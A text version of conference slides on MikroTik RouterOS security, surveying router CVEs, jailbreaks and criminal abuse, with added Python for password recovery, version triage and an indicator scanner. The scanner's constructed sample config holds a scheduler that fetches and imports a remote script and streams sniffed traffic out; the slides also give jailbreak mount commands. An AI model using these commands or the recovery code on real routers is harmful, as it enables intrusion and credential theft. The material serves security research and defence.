![Page 1: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/1.jpg)
The state of MikroTik security. An overview.
SigSegV1, Paris, France
Author
● Lead researcher at Possible Security, Latvia
● Hacking and breaking things
  – Network flow analysis
  – Reverse engineering
  – Social engineering
  – Legal dimension
● http://kirils.org/
● twitter / @KirilsSolovjovs
Mikrotik RouterOS
● Linux
  – old
● Startup scripts
● Nova binaries
● Config
Closed source and closed ecosystem
Is it popular?
France = 3505 devices = 0.16%
RouterOS 6.43.4
Ecosystem. Possible entry points.
Vulnerabilities
● 283i4jfkai3389
● chimay_red
● devel-login based jailbreaks
● CVE-2018-7445 samba
● CVE-2018-14847 winbox
● CVE-2018-1156, CVE-2018-1157, CVE-2018-1158, CVE-2018-1159
283i4jfkai3389
‘MEMBER ME?
key = md5(username + "283i4jfkai3389")
password = user["password"] xor key
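The scheme on this slide written out in Python, as an added example (not the speaker's code or anything shipped by MikroTik): the constant and the MD5/XOR construction are what the slide states; the usernames, passwords and the "same username on another device" scenario are constructed to show why a copy of the user database is enough to recover every password offline.

```python
# Added example (not the slide author's code): the pre-6.43 user.dat password
# obfuscation shown on the slide, written out so its weakness can be tried offline.
# The constant and the MD5/XOR scheme come from the slide; usernames, passwords and
# the "second user with the same name" scenario below are constructed.
import hashlib

SALT = b"283i4jfkai3389"   # fixed string from the slide, the same on every device


def keystream(username: bytes) -> bytes:
    """key = md5(username + "283i4jfkai3389"): 16 bytes, derived from public data only."""
    return hashlib.md5(username + SALT).digest()


def xor_with_key(data: bytes, key: bytes) -> bytes:
    # The 16-byte key is reused cyclically, so byte i is XORed with key[i % 16].
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(username: bytes, password: bytes) -> bytes:
    """What the router stores for this user (the slide's user["password"])."""
    return xor_with_key(password, keystream(username))


def recover(username: bytes, stored: bytes) -> bytes:
    """password = user["password"] xor key; XOR is its own inverse, no secret needed."""
    return xor_with_key(stored, keystream(username))


def xor_blobs(a: bytes, b: bytes) -> bytes:
    """XOR of two stored blobs for the same username cancels the key entirely,
    leaving plaintext_a XOR plaintext_b (classic keystream reuse)."""
    return bytes(x ^ y for x, y in zip(a, b))


if __name__ == "__main__":
    stored = obfuscate(b"admin", b"s3cret-pass")
    print("stored   :", stored.hex())
    print("recovered:", recover(b"admin", stored))
    # Same username on a different device -> identical keystream, no per-device secret
    other = obfuscate(b"admin", b"another-pass")
    print("pt_a ^ pt_b:", xor_blobs(stored, other).hex())
```

There is no per-device secret and no random salt in the key derivation, so anything that leaks the stored blob (the winbox file read later in the talk is the obvious path) yields the password with one MD5 and one XOR; the 16-byte key also repeats for passwords longer than 16 bytes.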
chimay_red
● Unauthenticated RCE
● Stack clashing by setting a large Content-Length
  – stack size on 6.31 and below is 0x800000
  – stack size on 6.32 and above is 0x020000
● /nova/bin/www Request::readPostData()
● Fixed in 6.38.5 & 6.37.5
devel-login based jailbreaks
● Authenticated root-level access
    [ -f /nova/etc/devel-login
      && username == devel
      && password == admin.password ]
    && /bin/ash
● /nova/bin/login
● Fixed in 6.41 (not backported)
CVE-2018-7445 samba
● Unauthenticated RCE
● Via heap buffer overflow with long NetBIOS names in NetBIOS session request messages
● /nova/bin/smb SmbRmDir()
● Fixed in 6.41.3 & 6.40.7
CVE-2018-14847 winbox
● Unauthenticated predefined function execution (file read)
● Via abusing the DLL download functionality
● /nova/bin/mproxy
● Fixed in 6.42.1 & 6.40.8
CVE-2018-1156 licupgr
● Authenticated RCE
● Via stack buffer overflow in sprintf()
● /nova/bin/licupgr busy_cde()
● Fixed in 6.42.7 & 6.40.9
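A triage helper that applies the "fixed in" versions quoted on the slides above to a RouterOS version string, added here as an example (not from the talk or from the speaker's tools). It assumes, which the slides do not spell out, that "fixed in X & Y" means X is the first fixed release on the current branch and Y the backport on the long-term branch, so a release is clean once it is at or above X, or when it sits on Y's minor branch and is at or above Y. The last table entry comes from the "Hardening (6.43)" slide; devel-login has no backport according to its slide.

```python
# Added example, not from the talk: a triage helper that applies the "fixed in"
# versions quoted on the preceding slides to a RouterOS version string.
# Assumption (mine, not stated on the slides): "fixed in X & Y" means X is the fix on
# the current branch and Y the backport on the long-term branch, so a release is
# fixed once it is >= X, or when it sits on Y's minor branch and is >= Y.
# The last entry uses the "Hardening (6.43)" slide; devel-login has no backport.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    """6.43.4 -> (6, 43, 4); 6.41 -> (6, 41, 0). rc/beta suffixes are dropped, so
    6.43rc1 is treated as 6.43.0 (check the release notes before trusting that)."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"not a RouterOS version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


@dataclass(frozen=True)
class Fix:
    name: str
    current: Version             # first fixed release on the current branch
    longterm: Optional[Version]  # backported fix on the long-term branch, if any


# Fixed-in versions exactly as quoted on the slides
FIXES: List[Fix] = [
    Fix("chimay_red (www, unauthenticated RCE)", (6, 38, 5), (6, 37, 5)),
    Fix("devel-login jailbreak", (6, 41, 0), None),
    Fix("CVE-2018-7445 (smb, unauthenticated RCE)", (6, 41, 3), (6, 40, 7)),
    Fix("CVE-2018-14847 (winbox, unauthenticated file read)", (6, 42, 1), (6, 40, 8)),
    Fix("CVE-2018-1156 (licupgr, authenticated RCE)", (6, 42, 7), (6, 40, 9)),
    Fix("283i4jfkai3389 password obfuscation", (6, 43, 0), None),
]


def is_fixed(v: Version, fix: Fix) -> bool:
    if v >= fix.current:
        return True
    if fix.longterm is not None and v[:2] == fix.longterm[:2] and v >= fix.longterm:
        return True
    return False


def applicable(version: str) -> List[str]:
    """Names of the slide's issues that still apply to the given release."""
    v = parse_version(version)
    return [f.name for f in FIXES if not is_fixed(v, f)]


if __name__ == "__main__":
    for ver in ("6.31", "6.40.6", "6.41.4", "6.42.7", "6.43.4"):
        print(ver, "->", applicable(ver) or "nothing from this list")
```

The table covers only what these slides list, so an empty result means "none of the issues from this talk", not "patched"; 6.41.x, for instance, comes out vulnerable to the winbox read because it is below 6.42.1 and not on the 6.40 long-term branch, which is the behaviour the two fixed-in numbers imply.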
package/option based jailbreak
● lib/libumsg.so
● nv::hasPackage("option")
● nv::hasPackage checks if
  – /pckg/<name> exists
  – it is not a symlink
  – the fs is squashfs
● mkdir /pckg/option
● mount -o bind /pckg/dude/ /pckg/option
¯\_(ツ)_/¯
jailbreak
● Use exploit-backup for versions before 6.41
● Use the new method for versions starting with 6.41
● Should support all current versions up to at least 6.43.4
Status quo
What versions are in use?
Vulnerable devices
Abuse by criminals
● RouterOS powerful enough on its own
● Still installing custom binaries
  – 3.3.5mips.ko
  – bash
  – wget
  – socat
  – iptables (lol)
Abuse by criminals
● «Thousands of MikroTik Routers Hacked to Eavesdrop On Network Traffic»
● TZSP to sniff
● Socks4
● Coinhive miner →
● Scheduler to update config and restore control
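A small scanner over a RouterOS `/export`, added as an example (not from the talk), that looks for the four indicators named on this slide: TZSP sniffer streaming, a SOCKS proxy, a scheduler entry that re-fetches and imports configuration, and an enabled web proxy (the 2018 campaign injected the Coinhive script through the proxy's error page). The export text is constructed for this example and 203.0.113.10 is a documentation address; the export syntax and continuation-line format are RouterOS's own.

```python
# Added example (not from the talk): scan a RouterOS "/export" for the abuse
# indicators listed on the slide: TZSP sniffer streaming, SOCKS proxy enabled, a
# scheduler entry that re-fetches and imports configuration, and the web proxy that
# the 2018 campaign used to inject the Coinhive miner into pages. The export text
# below is constructed for this example; 203.0.113.10 is a documentation address.
import re
from typing import Dict, List, Tuple

SAMPLE_EXPORT = """\
# constructed sample, not from a real device
/tool sniffer
set filter-ip-protocol=tcp filter-port=20,21,25,110,143,161 streaming-enabled=yes \\
    streaming-server=203.0.113.10
/ip socks
set enabled=yes port=4153
/ip proxy
set enabled=yes port=8080
/system scheduler
add interval=1d name=upd on-event="/tool fetch address=203.0.113.10 \\
    src-path=/mikrotik.php mode=http dst-path=mikrotik.php; /import mikrotik.php" \\
    policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive
add interval=1d name=ntp-sync on-event="/system ntp client set enabled=yes"
"""

KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')

Item = Tuple[str, str, Dict[str, str]]   # (section, verb, parameters)


def logical_lines(export: str) -> List[str]:
    """Join export continuation lines (trailing backslash, indented next line) and
    drop comments, so every returned line is one complete command."""
    out: List[str] = []
    buf = ""
    for raw in export.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "
            continue
        buf += line
        if buf and not buf.startswith("#"):
            out.append(buf)
        buf = ""
    if buf and not buf.startswith("#"):
        out.append(buf)
    return out


def parse_export(export: str) -> List[Item]:
    section = ""
    items: List[Item] = []
    for line in logical_lines(export):
        if line.startswith("/"):
            section = line           # e.g. "/tool sniffer"
            continue
        verb, _, rest = line.partition(" ")
        params = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        items.append((section, verb, params))
    return items


def scan(export: str) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    for section, _verb, p in parse_export(export):
        if section == "/tool sniffer" and p.get("streaming-enabled") == "yes":
            findings.append({"kind": "tzsp-sniffer", "section": section,
                             "detail": "TZSP streaming to " + p.get("streaming-server", "?")})
        elif section == "/ip socks" and p.get("enabled") == "yes":
            findings.append({"kind": "socks", "section": section,
                             "detail": "SOCKS proxy listening on port " + p.get("port", "1080")})
        elif section == "/ip proxy" and p.get("enabled") == "yes":
            findings.append({"kind": "web-proxy", "section": section,
                             "detail": "web proxy enabled; check its error page for injected script"})
        elif section == "/system scheduler" and re.search(r"\bfetch\b|/import\b", p.get("on-event", "")):
            findings.append({"kind": "scheduler-fetch", "section": section,
                             "detail": "scheduler " + p.get("name", "?") + " fetches/imports config"})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EXPORT):
        print(f["kind"].ljust(16), f["section"].ljust(18), f["detail"])
```

Run it against `/export` output pulled from each device; a scheduler that re-imports a fetched script is the persistence mechanism the slide refers to, so patching without removing that entry hands the box straight back.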
Hardening (6.43)
● Password «fixed». Uses SHA256 & ECC now.
Jailbreaks and other tools available at https://github.com/0ki/mikrotik-tools
http://kirils.org/
twitter / @KirilsSolovjovs ← follow me!
WARNING! English ;)